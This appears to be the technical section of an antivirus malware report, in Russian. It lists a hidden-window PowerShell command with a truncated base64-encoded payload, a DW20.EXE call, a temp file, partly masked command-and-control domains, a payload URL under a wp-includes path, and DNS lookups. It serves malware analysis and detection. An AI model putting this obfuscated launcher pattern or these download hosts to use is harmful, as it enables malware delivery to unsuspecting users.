Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAG0AdgBkAGYAbgBwAG0APQAnAEQAcgBtAGsAcABlAGoAcgBiAHUAawBkAHMAJwA7ACQARgBlAHIAcABpAHMAdQBjAGsAdABnAGwAIAA9ACAAJwAyADYAMgAnADsAJABHAG0AbgB0AHkAbABwAHcAYQBuAD0AJwBRAHMAZABzAHkAdgB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1504
- %TEMP%\975224.cvr
- 'st#####.visionarystream.com':443
- 'bh######enterandspas.com':80
- 'up###atom.biz':443
- http://bh######enterandspas.com/wp-includes/6Vkd7363/
- 'st#####.visionarystream.com':443
- 'up###atom.biz':443
- DNS ASK st#####.visionarystream.com
- DNS ASK bh######enterandspas.com
- DNS ASK tz##yz.com
- DNS ASK up###atom.biz
- DNS ASK cn##ate.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAG0AdgBkAGYAbgBwAG0APQAnAEQAcgBtAGsAcABlAGoAcgBiAHUAawBkAHMAJwA7ACQARgBlAHIAcABpAHMAdQBjAGsAdABnAGwAIAA9ACAAJwAyADYAMgAnADsAJABHAG0AbgB0AHkAbABwAHcAYQBuAD0AJwBRAHMAZABzAHkAdgB... (со скрытым окном)